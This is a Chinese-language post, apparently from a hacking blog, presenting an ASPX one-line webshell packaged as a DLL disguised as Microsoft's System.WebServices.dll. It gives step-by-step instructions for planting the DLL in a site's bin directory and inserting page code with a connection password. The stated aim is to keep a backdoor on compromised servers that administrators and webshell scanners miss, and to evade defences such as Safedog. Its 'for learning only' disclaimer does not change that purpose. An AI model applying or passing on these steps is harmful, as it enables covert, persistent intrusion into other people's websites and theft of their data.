ASPX版菜⼑⼀句话,留后门专⽤
⾸先解释⼀下为什么要做这个玩意:
众所周知⼀句话是不能插⼊到⽂件之中的,除⾮那个页⾯使⽤Jscript编写,但是现在看来 Jscript市场很低,遇到的站基本都是C#。新建⼀个SHELL太过于明显,⽽且其中的eval更是在WEBSHELL扫描⼯具的淫威下直接出局。如果不能提权的话,那么过⼀段时间再打开往往⾯临的是⼤⼤的404。
综上,利⽤会加载bin⽬录中的类库的特点和命名空间这个神奇的东西编写了这个程序,将⽂件放在bin⽬录并在⽂件中插⼊调⽤代码即可。可能你会说放在bin⽬录不是更明显?这⾥要说明⼀点,相信许多的管理猿/站长都没有查看bin⽬录的习惯,⽽管理猿/站长并不⼀定是C#程序猿。假如你是⼀个这样的管理猿/站长,看到⼀个名叫 System.WebServices.dll、版权写的是微软、产品名称是.Net FrameWork的类库你会不会删?
当然这⽅法瞒不过聪明的管理猿,但传统⽅式同样瞒不住。可能这东西有些鸡肋,但在某些时候未必没有⽤处。
另外,限于菜⼑提供的接⼝,程序功能远远不全,对应的外壳正在开发中,届时会带有更强的功能,敬请期待。
(后续将提供的功能:⼀键脱裤、注册表管理、以其他⽤户权限执⾏程序等)
0x02 使⽤说明
⼀、将System.WebServices.dll复制到⽹站根⽬录的bin⼦⽬录中。
⼆、在任意页⾯插⼊<%WebServices.ShowRunnerVersion();%>并访问,出现授权与免责声明页⾯表⽰调⽤成功。webservice用户名密码调用
三、删除第⼆步中插⼊的代码,重新插⼊<%WebServices.InitalizeWebServices("fuck");%>,其中fuck为菜⼑连接所需的密码。
四、使⽤中国菜⼑连接,类型选择Customize,密码为第三步中约定的密码。
0x03 注意
⼀、程序⽆视预编译,代码可以插在任意aspx页⾯内,如果连接失败则是因为在先前代码中(.cs或预编译之后的库中)调⽤了Response.End()⽅法,请更换页⾯。如果是插⼊到页⾯对应的.cs代码⽂件之中,请去除脚本标记<%%>之后插⼊到Page_Load⽅法对应的代码块之中。
⼆、由于菜⼑对于Customize的连接⽅式是⾮加密的,所以安全狗等防御软件会拦截查询数据库等操作,遇到此情况请换⽤菜⼑⼀句话或使⽤其他脚本查询(外壳做出来后会换⽤加密连接)。
三、发现BUG或提出建议请到农村⼈博客->之家留⾔,毕竟是蛋疼的东西还请多多包涵。
四、本程序只为学习编程,任何⼈使⽤前必须搭建测试站点并在页⾯之中调⽤WebServices.ShowRunnerVersion()⽅法访问以阅读授权及免责声明。对于因使⽤不当造成的后果本⼈不负有任何的法律责任。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。